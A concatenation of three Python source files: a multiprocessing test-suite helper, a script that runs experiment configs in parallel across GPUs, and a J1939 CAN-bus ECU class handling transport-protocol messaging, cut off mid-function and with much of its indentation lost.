Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
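# e.g. base '_TestPoll' with type 'processes' becomes 'WithProcessesTestPoll'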
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
run_folder.py
|
import multiprocessing
import os, sys
import numpy as np
import runner
import time
def main(folder_path: str, gpus: str, parallel_runs=3, num_reruns=3):
gpus = gpus.strip().split(',' if ',' in gpus else ';')
parallel_runs = int(parallel_runs)
num_reruns = int(num_reruns)
assert parallel_runs % len(gpus) == 0, f'Num parallel runs {parallel_runs} must be multiple of num gpus {len(gpus)}'
if os.path.isfile(os.path.join(folder_path, 'schedule')):
    # Resume pending runs from an existing schedule. Keys that carry a mark
    # ('p' while processing, 'pf' when finished, see write_file) fail
    # isnumeric() and are skipped, so only unprocessed entries are rerun.
    d = {}
    with open(os.path.join(folder_path, 'schedule'), 'r') as f:
        for l in f.read().splitlines():
            key, _, value = l.partition(':')
            d.setdefault(key, []).append(value)
    configs = {int(k): np.array(v) for k, v in d.items() if k.isnumeric()}
else:
    configs = sorted([os.path.join(folder_path, f) for f in os.listdir(folder_path) if f.endswith('.json')])
    print(f'Found {len(configs)} configs:')
    for c in configs:
        print(f'\t{c}')
    print('')
    # Repeat each config num_reruns times and split the work evenly
    # across parallel_runs worker processes
    configs = np.array(configs * num_reruns)
    configs = np.array_split(configs, parallel_runs)
    configs = {process_nr: c_list for process_nr, c_list in enumerate(configs)}
    with open(os.path.join(folder_path, 'schedule'), 'w') as f:
        for process_nr, c_list in configs.items():
            for c in c_list:
                f.write(f'{process_nr}:{c}\n')
process_list = []
for process_nr, c_list in configs.items():
p = multiprocessing.Process(target=run_process, args=(c_list, gpus[process_nr % len(gpus)], process_nr))
p.daemon = True
p.start()
process_list.append(p)
# Wait 5s before next process is started so there is no interference
time.sleep(5)
for p in process_list:
p.join()
print('Finished')
def run_process(c_list: list, gpu_nr: str, process_nr=0):
print(f'[{process_nr}: {time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime())}]\tStarting process nr. {process_nr} with {len(c_list)} total runs')
t_list = []
t = time.time()
for i, conf in enumerate(c_list):
# Mark processing in schedule
write_file(os.path.join(*os.path.split(conf)[:-1]), f'{process_nr}', conf, 'p')
with HiddenPrints():
runner.main(config=conf, name='', ti_option='', gpu=gpu_nr, use_mp=None, num_workers=None)
t_list.append(time.time() - t)
t = time.time()
eta = np.array(t_list).mean() * (len(c_list) - (i + 1)) + t
eta = ')' if (len(c_list) - (i + 1)) == 0 else f' -> ETA: {time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime(eta))})'
print(f'[{process_nr}: {time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime())}] Finished run {i + 1}/{len(c_list)} [{(i + 1)/len(c_list)*100:.2f}%] '
f'({pretty_time(t_list[-1])}{eta}')
# Mark finished in schedule
write_file(os.path.join(*os.path.split(conf)[:-1]), f'{process_nr}p', conf, 'f')
def write_file(path, queryf, queryb, mark):
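# Re-mark a single schedule entry: the line '{queryf}:{queryb}' becomes
# '{queryf}{mark}:{queryb}'. A 'temp' file in the same folder serves as a
# crude cross-process lock while the schedule is rewritten.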
done = False
while not done:
if not os.path.isfile(os.path.join(path, 'temp')):
# Create temp file
with open(os.path.join(path, 'temp'), 'w'): pass
# Write new schedule
with open(os.path.join(path, 'schedule'), 'r') as f:
t = f.read().splitlines()
with open(os.path.join(path, 'schedule'), 'w') as f:
f.truncate()
found = False
for i, c in enumerate(t):
if c.split(':')[0] == str(queryf) and c.split(':')[1] == str(queryb) and not found:
f.write(f'{queryf}{mark}:{queryb}\n')
found = True
else:
f.write(c + '\n')
# Remove temp file
os.remove(os.path.join(path, 'temp'))
done = True
else:
time.sleep(1)
def pretty_time(secs):
    ints = [86400, 3600, 60, 1]
    # Find the largest unit that fits; default to seconds so that
    # sub-second durations do not raise an IndexError
    start_ = next((i for i in range(4) if secs >= ints[i]), 3)
    divs = [int(((secs % ints[i - 1]) if i > 0 else secs) / ints[i]) for i in range(4)]
    divs = [f'{a}{b}' for a, b in zip(divs, 'dhms')]
    return ' '.join(divs[start_:])
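# Sanity check of the formatting (hypothetical values):
#   pretty_time(3661)  -> '1h 1m 1s'
#   pretty_time(90061) -> '1d 1h 1m 1s'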
class HiddenPrints:
def __enter__(self):
self._original_stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
self._original_stderr = sys.stderr
sys.stderr = sys.stdout
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stdout.close()
sys.stdout = self._original_stdout
sys.stderr = self._original_stderr
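# Typical use (as in run_process above): suppress all output of the wrapped
# call while keeping this script's own progress prints visible.
#
#   with HiddenPrints():
#       some_noisy_call()   # hypothetical; stdout/stderr are discarded here
#   print('visible again')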
if __name__ == '__main__':
main(*sys.argv[1:])
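# Invocation sketch (hypothetical paths and values):
#   python run_folder.py ./experiments 0,1 4 3
# runs every *.json config in ./experiments three times, spread over four
# worker processes that alternate between GPUs 0 and 1.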
|
electronic_control_unit.py
|
import logging
import can
from can import Listener
import time
import threading
try:
# Python27
import Queue as queue
except ImportError:
# Python35
import queue
import j1939
logger = logging.getLogger(__name__)
class ElectronicControlUnit(object):
"""ElectronicControlUnit (ECU) holding one or more ControllerApplications (CAs)."""
class ConnectionMode(object):
RTS = 16
CTS = 17
EOM_ACK = 19
BAM = 32
ABORT = 255
class ConnectionAbortReason(object):
BUSY = 1 # Already in one or more connection managed sessions and cannot support another
RESOURCES = 2 # System resources were needed for another task so this connection managed session was terminated
TIMEOUT = 3 # A timeout occurred
# 4..250 Reserved by SAE
CTS_WHILE_DT = 4 # according to AUTOSAR: CTS message received while data transfer is in progress
# 251..255 Per J1939/71 definitions - but there are none?
class Timeout(object):
"""Timeouts according SAE J1939/21"""
Tr = 0.200 # Response Time
Th = 0.500 # Holding Time
T1 = 0.750
T2 = 1.250
T3 = 1.250
T4 = 1.050
# timeout for multi packet broadcast messages 50..200ms
Tb = 0.050
class SendBufferState(object):
WAITING_CTS = 0 # waiting for CTS
SENDING_IN_CTS = 1 # sending packages (temporary state)
SENDING_BM = 2 # sending broadcast packages
def __init__(self, bus=None):
"""
:param can.BusABC bus:
A python-can bus instance to re-use.
"""
#: A python-can :class:`can.BusABC` instance
self._bus = bus
# Locking object for send
self._send_lock = threading.Lock()
#: Includes at least MessageListener.
self._listeners = [MessageListener(self)]
self._notifier = None
self._subscribers = []
# List of ControllerApplication
self._cas = []
# Receive buffers
self._rcv_buffer = {}
# Send buffers
self._snd_buffer = {}
# List of timer events the job thread should care of
self._timer_events = []
self._job_thread_end = threading.Event()
logger.info("Starting ECU async thread")
self._job_thread_wakeup_queue = queue.Queue()
self._job_thread = threading.Thread(target=self._async_job_thread, name='j1939.ecu job_thread')
# A thread can be flagged as a "daemon thread". The significance of
# this flag is that the entire Python program exits when only daemon
# threads are left.
self._job_thread.daemon = True
self._job_thread.start()
# TODO: do we have to stop the thread somehow?
def _async_job_thread(self):
"""Asynchronous thread for handling various jobs
This Thread handles various tasks:
- Event trigger for associated CAs
- Timeout monitoring of communication objects
To construct a blocking wait with timeout, the task waits on a
queue object. When other tasks add timer events they can wake up
the timeout handler so that it recalculates its sleep time and
wakes at the new events.
"""
while not self._job_thread_end.is_set():
now = time.time()
next_wakeup = time.time() + 5.0 # wakeup in 5 seconds
# check receive buffers for timeout
# using "list(x)" to prevent "RuntimeError: dictionary changed size during iteration"
for bufid in list(self._rcv_buffer):
buf = self._rcv_buffer[bufid]
if buf['deadline'] != 0:
if buf['deadline'] > now:
if next_wakeup > buf['deadline']:
next_wakeup = buf['deadline']
else:
# deadline reached
logger.info("Deadline reached for rcv_buffer src 0x%02X dst 0x%02X", buf['src_address'], buf['dest_address'] )
if buf['dest_address'] != j1939.ParameterGroupNumber.Address.GLOBAL:
# TODO: should we handle retries?
self.send_tp_abort(buf['dest_address'], buf['src_address'], ElectronicControlUnit.ConnectionAbortReason.TIMEOUT, buf['pgn'])
# TODO: should we notify our CAs about the cancelled transfer?
del self._rcv_buffer[bufid]
# check send buffers
# using "list(x)" to prevent "RuntimeError: dictionary changed size during iteration"
for bufid in list(self._snd_buffer):
buf = self._snd_buffer[bufid]
if buf['deadline'] != 0:
if buf['deadline'] > now:
if next_wakeup > buf['deadline']:
next_wakeup = buf['deadline']
else:
# deadline reached
if buf['state'] == ElectronicControlUnit.SendBufferState.WAITING_CTS:
logger.info("Deadline WAITING_CTS reached for snd_buffer src 0x%02X dst 0x%02X", buf['src_address'], buf['dest_address'] )
self.send_tp_abort(buf['src_address'], buf['dest_address'], ElectronicControlUnit.ConnectionAbortReason.TIMEOUT, buf['pgn'])
# TODO: should we notify our CAs about the cancelled transfer?
del self._snd_buffer[bufid]
elif buf['state'] == ElectronicControlUnit.SendBufferState.SENDING_IN_CTS:
# do not care about deadlines while sending (from within other function)
# TODO: maybe we can implement an asynchronous send queue here?
pass
elif buf['state'] == ElectronicControlUnit.SendBufferState.SENDING_BM:
# send next broadcast message...
offset = buf['next_packet_to_send'] * 7
data = buf['data'][offset:]
if len(data)>7:
data = data[:7]
else:
while len(data)<7:
data.append(255)
data.insert(0, buf['next_packet_to_send']+1)
self.send_tp_dt(buf['src_address'], buf['dest_address'], data)
buf['next_packet_to_send'] += 1
if buf['next_packet_to_send'] < buf['num_packages']:
buf['deadline'] = time.time() + ElectronicControlUnit.Timeout.Tb
# recalc next wakeup
if next_wakeup > buf['deadline']:
next_wakeup = buf['deadline']
else:
# done
del self._snd_buffer[bufid]
else:
logger.critical("unknown SendBufferState %d", buf['state'])
del self._snd_buffer[bufid]
# check timer events
for event in self._timer_events:
if event['deadline'] > now:
if next_wakeup > event['deadline']:
next_wakeup = event['deadline']
else:
# deadline reached
logger.debug("Deadline for event reached")
if event['callback'](event['cookie']) == True:
# a True return value means the callback wants to be called again
while event['deadline'] < now:
# just to take care of overruns
event['deadline'] += event['delta_time']
# recalc next wakeup
if next_wakeup > event['deadline']:
next_wakeup = event['deadline']
else:
# remove from list
self._timer_events.remove( event )
time_to_sleep = next_wakeup - time.time()
if time_to_sleep > 0:
try:
self._job_thread_wakeup_queue.get(True, time_to_sleep)
except queue.Empty:
# do nothing
pass
def stop(self):
"""Stops the ECU background handling
This function explicitly stops the background handling of the ECU.
"""
self._job_thread_end.set()
self._job_thread_wakeup()
self._job_thread.join()
def _job_thread_wakeup(self):
"""Wakeup the async job thread
By calling this function we wakeup the asyncronous job thread to
force a recalculation of his next wakeup event.
"""
self._job_thread_wakeup_queue.put(1)
def add_timer(self, delta_time, callback, cookie=None):
"""Adds a callback to the list of timer events
:param delta_time:
The time in seconds after which the event is to be triggered.
:param callback:
The callback function to call
"""
d = {
'delta_time': delta_time,
'callback': callback,
'deadline': (time.time() + delta_time),
'cookie': cookie,
}
self._timer_events.append( d )
self._job_thread_wakeup()
def remove_timer(self, callback):
"""Removes ALL entries from the timer event list for the given callback
:param callback:
The callback to be removed from the timer event list
"""
for event in self._timer_events:
if event['callback'] == callback:
self._timer_events.remove( event )
self._job_thread_wakeup()
def connect(self, *args, **kwargs):
"""Connect to CAN bus using python-can.
Arguments are passed directly to :class:`can.BusABC`. Typically these
may include:
:param channel:
Backend specific channel for the CAN interface.
:param str bustype:
Name of the interface. See
`python-can manual <https://python-can.readthedocs.io/en/latest/configuration.html#interface-names>`__
for full list of supported interfaces.
:param int bitrate:
Bitrate in bit/s.
:raises can.CanError:
When connection fails.
"""
self._bus = can.interface.Bus(*args, **kwargs)
logger.info("Connected to '%s'", self._bus.channel_info)
self._notifier = can.Notifier(self._bus, self._listeners, 1)
def disconnect(self):
"""Disconnect from the CAN bus.
Must be overridden in a subclass if a custom interface is used.
"""
self._notifier.stop()
self._bus.shutdown()
self._bus = None
def subscribe(self, callback):
"""Add the given callback to the message notification stream.
:param callback:
Function to call when message is received.
"""
self._subscribers.append(callback)
def unsubscribe(self, callback):
"""Stop listening for message.
:param callback:
Function to call when message is received.
"""
self._subscribers.remove(callback)
def _buffer_hash(self, src_address, dest_address):
"""Calcluates a hash value for the given address pair
:param src_address:
The Source-Address the connection should bound to.
:param dest_address:
The Destination-Address the connection should bound to.
:return:
The calculated hash value.
:rtype: int
"""
return ((src_address & 0xFF) << 8) | (dest_address & 0xFF)
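# e.g. _buffer_hash(0x80, 0x20) == 0x8020 while _buffer_hash(0x20, 0x80) == 0x2080,
# so each direction of a connection gets its own buffer key.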
def _process_tp_cm(self, mid, dest_address, data, timestamp):
"""Processes a Transport Protocol Connection Management (TP.CM) message
:param j1939.MessageId mid:
A MessageId object holding the information extracted from the can_id.
:param int dest_address:
The destination address of the message
:param bytearray data:
The data contained in the can-message.
:param float timestamp:
The timestamp the message was received (mostly) in fractions of Epoch-Seconds.
"""
control_byte = data[0]
pgn = data[5] | (data[6] << 8) | (data[7] << 16)
src_address = mid.source_address
if control_byte == ElectronicControlUnit.ConnectionMode.RTS:
message_size = data[1] | (data[2] << 8)
num_packages = data[3]
buffer_hash = self._buffer_hash(src_address, dest_address)
if buffer_hash in self._rcv_buffer:
# according SAE J1939-21 we have to send an ABORT if an active
# transmission is already established
self.send_tp_abort(dest_address, src_address, ElectronicControlUnit.ConnectionAbortReason.BUSY, pgn)
return
# open new buffer for this connection
self._rcv_buffer[buffer_hash] = {
"pgn": pgn,
"message_size": message_size,
"num_packages": num_packages,
"next_packet": 1,
"data": [],
"deadline": time.time() + ElectronicControlUnit.Timeout.T2,
'src_address' : src_address,
'dest_address' : dest_address,
}
self.send_tp_cts(dest_address, src_address, 1, 1, pgn)
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.CTS:
num_packages = data[1]
next_package_number = data[2] - 1
buffer_hash = self._buffer_hash(dest_address, src_address)
if buffer_hash not in self._snd_buffer:
self.send_tp_abort(dest_address, src_address, ElectronicControlUnit.ConnectionAbortReason.RESOURCES, pgn)
return
if num_packages == 0:
# SAE J1939/21
# receiver requests a pause
self._snd_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.Th
self._job_thread_wakeup()
return
self._snd_buffer[buffer_hash]['deadline'] = time.time() + 10.0 # do not monitor deadlines while sending
self._snd_buffer[buffer_hash]['state'] = ElectronicControlUnit.SendBufferState.SENDING_IN_CTS
self._job_thread_wakeup()
# TODO: should we send the answer packets asynchronously
# maybe in our _job_thread?
for package in range(next_package_number, next_package_number + num_packages):
offset = package * 7
data = self._snd_buffer[buffer_hash]['data'][offset:]
if len(data)>7:
data = data[:7]
else:
while len(data)<7:
data.append(255)
data.insert(0, package+1)
self.send_tp_dt(dest_address, src_address, data)
self._snd_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T3
self._snd_buffer[buffer_hash]['state'] = ElectronicControlUnit.SendBufferState.WAITING_CTS
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.EOM_ACK:
buffer_hash = self._buffer_hash(dest_address, src_address)
if buffer_hash not in self._snd_buffer:
self.send_tp_abort(dest_address, src_address, ElectronicControlUnit.ConnectionAbortReason.RESOURCES, pgn)
return
# TODO: should we inform the application about the successful transmission?
del self._snd_buffer[buffer_hash]
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.BAM:
message_size = data[1] | (data[2] << 8)
num_packages = data[3]
buffer_hash = self._buffer_hash(src_address, dest_address)
if buffer_hash in self._rcv_buffer:
# TODO: should we deliver the partly received message to our CAs?
del self._rcv_buffer[buffer_hash]
self._job_thread_wakeup()
# init new buffer for this connection
self._rcv_buffer[buffer_hash] = {
"pgn": pgn,
"message_size": message_size,
"num_packages": num_packages,
"next_packet": 1,
"data": [],
"deadline": timestamp + ElectronicControlUnit.Timeout.T1,
'src_address' : src_address,
'dest_address' : dest_address,
}
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.ABORT:
# TODO
pass
else:
raise RuntimeError("Received TP.CM with unknown control_byte %d", control_byte)
def _process_tp_dt(self, mid, dest_address, data, timestamp):
sequence_number = data[0]
src_address = mid.source_address
buffer_hash = self._buffer_hash(src_address, dest_address)
if buffer_hash not in self._rcv_buffer:
# TODO: LOG/TRACE/EXCEPTION?
return
if sequence_number != self._rcv_buffer[buffer_hash]['next_packet']:
if dest_address == j1939.ParameterGroupNumber.Address.GLOBAL:
# TODO:
return
self.send_tp_cts(dest_address, src_address, 1, self._rcv_buffer[buffer_hash]['next_packet'], self._rcv_buffer[buffer_hash]['pgn'])
self._rcv_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T2
self._job_thread_wakeup()
return
self._rcv_buffer[buffer_hash]['next_packet'] += 1
self._rcv_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T1
self._job_thread_wakeup()
self._rcv_buffer[buffer_hash]['data'].extend(data[1:])
# TODO: should we check the number of received messages instead?
if len(self._rcv_buffer[buffer_hash]['data']) >= self._rcv_buffer[buffer_hash]['message_size']:
logger.info("finished RCV of PGN {} with size {}".format(self._rcv_buffer[buffer_hash]['pgn'], self._rcv_buffer[buffer_hash]['message_size']))
# shorten data to message_size
self._rcv_buffer[buffer_hash]['data'] = self._rcv_buffer[buffer_hash]['data'][:self._rcv_buffer[buffer_hash]['message_size']]
# finished reassembly
if dest_address != j1939.ParameterGroupNumber.Address.GLOBAL:
self.send_tp_eom_ack(dest_address, src_address, self._rcv_buffer[buffer_hash]['message_size'], self._rcv_buffer[buffer_hash]['num_packages'], self._rcv_buffer[buffer_hash]['pgn'])
self.notify_subscribers(mid.priority, self._rcv_buffer[buffer_hash]['pgn'], src_address, timestamp, self._rcv_buffer[buffer_hash]['data'])
del self._rcv_buffer[buffer_hash]
self._job_thread_wakeup()
return
if dest_address != j1939.ParameterGroupNumber.Address.GLOBAL:
self.send_tp_cts(dest_address, src_address, 1, self._rcv_buffer[buffer_hash]['next_packet'], self._rcv_buffer[buffer_hash]['pgn'])
self._rcv_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T2
self._job_thread_wakeup()
def notify(self, can_id, data, timestamp):
"""Feed incoming CAN message into this ecu.
If a custom interface is used, this function must be called for each
29-bit standard message read from the CAN bus.
:param int can_id:
CAN-ID of the message (always 29-bit)
:param bytearray data:
Data part of the message (0 - 8 bytes)
:param float timestamp:
The timestamp field in a CAN message is a floating point number
representing when the message was received since the epoch in
seconds.
Where possible this will be timestamped in hardware.
"""
mid = j1939.MessageId(can_id=can_id)
pgn = j1939.ParameterGroupNumber()
pgn.from_message_id(mid)
if pgn.is_pdu2_format:
# direct broadcast
self.notify_subscribers(mid.priority, pgn.value, mid.source_address, timestamp, data)
return
# peer to peer
# pdu_specific is destination Address
pgn_value = pgn.value & 0x1FF00
dest_address = pgn.pdu_specific # may be Address.GLOBAL
# TODO: iterate all CAs to check if we have to handle this destination address!
if dest_address != j1939.ParameterGroupNumber.Address.GLOBAL:
reject = True
for ca in self._cas:
if ca.message_acceptable(dest_address):
reject = False
break
            if reject:
return
if pgn_value == j1939.ParameterGroupNumber.PGN.ADDRESSCLAIM:
for ca in self._cas:
ca._process_addressclaim(mid, data, timestamp)
elif pgn_value == j1939.ParameterGroupNumber.PGN.REQUEST:
for ca in self._cas:
if ca.message_acceptable(dest_address):
ca._process_request(mid, dest_address, data, timestamp)
elif pgn_value == j1939.ParameterGroupNumber.PGN.TP_CM:
self._process_tp_cm(mid, dest_address, data, timestamp)
elif pgn_value == j1939.ParameterGroupNumber.PGN.DATATRANSFER:
self._process_tp_dt(mid, dest_address, data, timestamp)
else:
self.notify_subscribers(mid.priority, pgn_value, mid.source_address, timestamp, data)
return
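    # A minimal sketch of feeding one received frame into notify(); the CAN-ID
    # is hypothetical (priority 6, PGN 0xFEEC, source address 0x01):
    #
    #   ecu.notify(0x18FEEC01, bytearray(8), time.time())
    #
    # PDU2-format PGNs (PDU format >= 240, as here) go straight to the
    # subscribers; PDU1 traffic is first checked against the destination
    # addresses accepted by the attached ControllerApplications.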
def notify_subscribers(self, priority, pgn, sa, timestamp, data):
"""Feed incoming message to subscribers.
:param int priority:
Priority of the message
:param int pgn:
Parameter Group Number of the message
:param int sa:
Source Address of the message
        :param float timestamp:
Timestamp of the CAN message
:param bytearray data:
Data of the PDU
"""
logger.debug("notify subscribers for PGN {}".format(pgn))
# TODO: we have to filter the dest_address here!
for callback in self._subscribers:
callback(priority, pgn, sa, timestamp, data)
def add_ca(self, **kwargs):
"""Add a ControllerApplication to the ECU.
:param controller_application:
A :class:`j1939.ControllerApplication` object.
:param name:
A :class:`j1939.Name` object.
:param device_address:
An integer representing the device address to announce to the bus.
:return:
The CA object that was added.
        :rtype: j1939.ControllerApplication
"""
if 'controller_application' in kwargs:
ca = kwargs['controller_application']
else:
if 'name' not in kwargs:
raise ValueError("either 'controller_application' or 'name' must be provided")
name = kwargs.get('name')
da = kwargs.get('device_address', None)
ca = j1939.ControllerApplication(name, da)
self._cas.append(ca)
ca.associate_ecu(self)
return ca
class Acknowledgement(object):
ACK = 0
NACK = 1
AccessDenied = 2
CannotRespond = 3
def send_message(self, can_id, data):
"""Send a raw CAN message to the bus.
This method may be overridden in a subclass if you need to integrate
this library with a custom backend.
It is safe to call this from multiple threads.
:param int can_id:
CAN-ID of the message (always 29-bit)
:param data:
Data to be transmitted (anything that can be converted to bytes)
:raises can.CanError:
When the message fails to be transmitted
"""
if not self._bus:
raise RuntimeError("Not connected to CAN bus")
msg = can.Message(extended_id=True,
arbitration_id=can_id,
data=data
)
with self._send_lock:
self._bus.send(msg)
        # TODO: check for transmit errors
def send_tp_dt(self, src_address, dest_address, data):
pgn = j1939.ParameterGroupNumber(0, 235, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
self.send_message(mid.can_id, data)
def send_tp_abort(self, src_address, dest_address, reason, pgn_value):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.ABORT, reason, 0xFF, 0xFF, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_tp_cts(self, src_address, dest_address, num_packets, next_packet, pgn_value):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.CTS, num_packets, next_packet, 0xFF, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_tp_eom_ack(self, src_address, dest_address, message_size, num_packets, pgn_value):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.EOM_ACK, message_size & 0xFF, (message_size >> 8) & 0xFF, num_packets, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_tp_rts(self, src_address, dest_address, priority, pgn_value, message_size, num_packets):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=priority, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.RTS, message_size & 0xFF, (message_size >> 8) & 0xFF, num_packets, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_acknowledgement(self, control_byte, group_function_value, address_acknowledged, pgn):
data = [control_byte, group_function_value, 0xFF, 0xFF, address_acknowledged, (pgn & 0xFF), ((pgn >> 8) & 0xFF), ((pgn >> 16) & 0xFF)]
mid = j1939.MessageId(priority=6, parameter_group_number=0x00E800, source_address=255)
self.send_message(mid.can_id, data)
def send_tp_bam(self, src_address, priority, pgn_value, message_size, num_packets):
pgn = j1939.ParameterGroupNumber(0, 236, j1939.ParameterGroupNumber.Address.GLOBAL)
mid = j1939.MessageId(priority=priority, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.BAM, message_size & 0xFF, (message_size >> 8) & 0xFF, num_packets, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_pgn(self, data_page, pdu_format, pdu_specific, priority, src_address, data):
pgn = j1939.ParameterGroupNumber(data_page, pdu_format, pdu_specific)
if len(data) <= 8:
# send normal message
mid = j1939.MessageId(priority=priority, parameter_group_number=pgn.value, source_address=src_address)
self.send_message(mid.can_id, data)
else:
# init sequence
buffer_hash = self._buffer_hash(src_address, pdu_specific)
if buffer_hash in self._snd_buffer:
# There is already a sequence active for this pair
return False
message_size = len(data)
            num_packets = (message_size + 6) // 7  # ceil(message_size / 7)
if pdu_specific == j1939.ParameterGroupNumber.Address.GLOBAL:
# send BAM
self.send_tp_bam(src_address, priority, pgn.value, message_size, num_packets)
# init new buffer for this connection
self._snd_buffer[buffer_hash] = {
"pgn": pgn.value,
"priority": priority,
"message_size": message_size,
"num_packages": num_packets,
"data": data,
